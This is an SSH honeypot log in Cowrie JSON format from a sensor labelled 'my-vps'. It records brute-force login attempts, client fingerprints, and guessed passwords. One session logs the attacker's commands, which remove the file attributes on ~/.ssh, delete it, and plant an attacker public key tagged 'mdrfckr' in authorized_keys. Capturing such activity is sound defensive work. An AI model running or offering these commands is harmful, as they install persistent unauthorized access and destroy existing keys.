{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:05:54.985878Z","src_ip":"212.227.235.229","session":"59ee7022780e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54640,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c06ba37690a","protocol":"ssh","message":"New connection: 212.227.235.229:54640 (1.2.3.4:22) [session: 6c06ba37690a]","sensor":"my-vps","timestamp":"2025-08-31T06:05:55.276397Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:05:55.277249Z","src_ip":"212.227.235.229","session":"6c06ba37690a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:05:55.567240Z","src_ip":"212.227.235.229","session":"6c06ba37690a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:05:56.770167Z","src_ip":"212.227.235.229","session":"6c06ba37690a"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:05:58.062448Z","src_ip":"212.227.235.229","session":"6c06ba37690a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55984,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8b9e8a16027","protocol":"ssh","message":"New connection: 212.227.235.229:55984 (1.2.3.4:22) [session: d8b9e8a16027]","sensor":"my-vps","timestamp":"2025-08-31T06:05:58.344232Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:05:58.345062Z","src_ip":"212.227.235.229","session":"d8b9e8a16027"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:05:58.631196Z","src_ip":"212.227.235.229","session":"d8b9e8a16027"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:05:59.819396Z","src_ip":"212.227.235.229","session":"d8b9e8a16027"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:06:00.107406Z","src_ip":"212.227.235.229","session":"d8b9e8a16027"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:06:00.108666Z","src_ip":"212.227.235.229","session":"59ee7022780e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41646,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a00cffc7a66","protocol":"ssh","message":"New connection: 212.227.235.229:41646 (1.2.3.4:22) [session: 6a00cffc7a66]","sensor":"my-vps","timestamp":"2025-08-31T06:06:09.267104Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57720,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2dc3dac7fa5","protocol":"ssh","message":"New connection: 212.227.125.160:57720 (1.2.3.4:22) [session: f2dc3dac7fa5]","sensor":"my-vps","timestamp":"2025-08-31T06:06:09.731145Z"}
{"eventid":"cowrie.session.closed","duration":"72.1","message":"Connection lost after 72.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:06:09.776166Z","src_ip":"212.227.125.160","session":"2f732ca0137a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:06:10.217355Z","src_ip":"212.227.235.229","session":"6a00cffc7a66"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:06:10.217994Z","src_ip":"212.227.235.229","session":"6a00cffc7a66"}
{"eventid":"cowrie.login.failed","username":"test3","password":"welcome","message":"login attempt [test3/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T06:06:15.941212Z","src_ip":"212.227.235.229","session":"6a00cffc7a66"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:06:17.740135Z","src_ip":"212.227.235.229","session":"6a00cffc7a66"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56940,"dst_ip":"1.2.3.4","dst_port":22,"session":"114e5bb526de","protocol":"ssh","message":"New connection: 212.227.235.229:56940 (1.2.3.4:22) [session: 114e5bb526de]","sensor":"my-vps","timestamp":"2025-08-31T06:06:19.095732Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:06:19.096481Z","src_ip":"212.227.235.229","session":"114e5bb526de"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:06:19.368217Z","src_ip":"212.227.235.229","session":"114e5bb526de"}
{"eventid":"cowrie.login.failed","username":"mahendra","password":"mahendra","message":"login attempt [mahendra/mahendra] failed","sensor":"my-vps","timestamp":"2025-08-31T06:06:20.496652Z","src_ip":"212.227.235.229","session":"114e5bb526de"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:06:21.770345Z","src_ip":"212.227.235.229","session":"114e5bb526de"}
{"eventid":"cowrie.session.closed","duration":"20.7","message":"Connection lost after 20.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:06:30.428813Z","src_ip":"212.227.125.160","session":"f2dc3dac7fa5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59820,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a4268dffbab","protocol":"ssh","message":"New connection: 212.227.125.160:59820 (1.2.3.4:22) [session: 0a4268dffbab]","sensor":"my-vps","timestamp":"2025-08-31T06:06:30.777637Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45370,"dst_ip":"1.2.3.4","dst_port":22,"session":"0851728b7aa8","protocol":"ssh","message":"New connection: 212.227.235.229:45370 (1.2.3.4:22) [session: 0851728b7aa8]","sensor":"my-vps","timestamp":"2025-08-31T06:06:31.386737Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:06:31.494926Z","src_ip":"212.227.125.160","session":"0a4268dffbab"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:06:31.495764Z","src_ip":"212.227.125.160","session":"0a4268dffbab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60270,"dst_ip":"1.2.3.4","dst_port":22,"session":"06306e4d8581","protocol":"ssh","message":"New connection: 212.227.235.229:60270 (1.2.3.4:22) [session: 06306e4d8581]","sensor":"my-vps","timestamp":"2025-08-31T06:06:31.966206Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:06:31.967149Z","src_ip":"212.227.235.229","session":"06306e4d8581"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:06:32.225381Z","src_ip":"212.227.235.229","session":"06306e4d8581"}
{"eventid":"cowrie.login.success","username":"root","password":"Centos2025","message":"login attempt [root/Centos2025] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:06:33.293953Z","src_ip":"212.227.235.229","session":"06306e4d8581"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:06:33.830501Z","src_ip":"212.227.235.229","session":"06306e4d8581"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:06:33.831227Z","src_ip":"212.227.235.229","session":"06306e4d8581"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:06:33.832707Z","src_ip":"212.227.235.229","session":"06306e4d8581"}
{"eventid":"cowrie.login.failed","username":"test3","password":"welcome","message":"login attempt [test3/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T06:06:33.919320Z","src_ip":"212.227.125.160","session":"0a4268dffbab"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:06:34.092164Z","src_ip":"212.227.235.229","session":"06306e4d8581"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:06:34.674966Z","src_ip":"212.227.235.229","session":"06306e4d8581"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:06:34.675803Z","src_ip":"212.227.235.229","session":"06306e4d8581"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:06:34.934523Z","src_ip":"212.227.235.229","session":"06306e4d8581"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:06:34.935503Z","src_ip":"212.227.235.229","session":"06306e4d8581"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33086,"dst_ip":"1.2.3.4","dst_port":22,"session":"5149ce1a618d","protocol":"ssh","message":"New connection: 212.227.235.229:33086 (1.2.3.4:22) [session: 5149ce1a618d]","sensor":"my-vps","timestamp":"2025-08-31T06:06:35.191397Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:06:35.192054Z","src_ip":"212.227.235.229","session":"5149ce1a618d"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:06:35.444780Z","src_ip":"212.227.125.160","session":"0a4268dffbab"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:06:35.452489Z","src_ip":"212.227.235.229","session":"5149ce1a618d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:06:36.522811Z","src_ip":"212.227.235.229","session":"5149ce1a618d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60020,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b58ec2cf860","protocol":"ssh","message":"New connection: 212.227.235.229:60020 (1.2.3.4:22) [session: 9b58ec2cf860]","sensor":"my-vps","timestamp":"2025-08-31T06:06:36.692278Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:06:36.693562Z","src_ip":"212.227.235.229","session":"9b58ec2cf860"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52840,"dst_ip":"1.2.3.4","dst_port":22,"session":"822e99e5c69e","protocol":"ssh","message":"New connection: 212.227.235.229:52840 (1.2.3.4:22) [session: 822e99e5c69e]","sensor":"my-vps","timestamp":"2025-08-31T06:06:36.787938Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:06:36.791641Z","src_ip":"212.227.235.229","session":"822e99e5c69e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:06:36.970437Z","src_ip":"212.227.235.229","session":"9b58ec2cf860"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:06:37.783799Z","src_ip":"212.227.235.229","session":"5149ce1a618d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34086,"dst_ip":"1.2.3.4","dst_port":22,"session":"aed7fc54d74f","protocol":"ssh","message":"New connection: 212.227.235.229:34086 (1.2.3.4:22) [session: aed7fc54d74f]","sensor":"my-vps","timestamp":"2025-08-31T06:06:38.038786Z"}
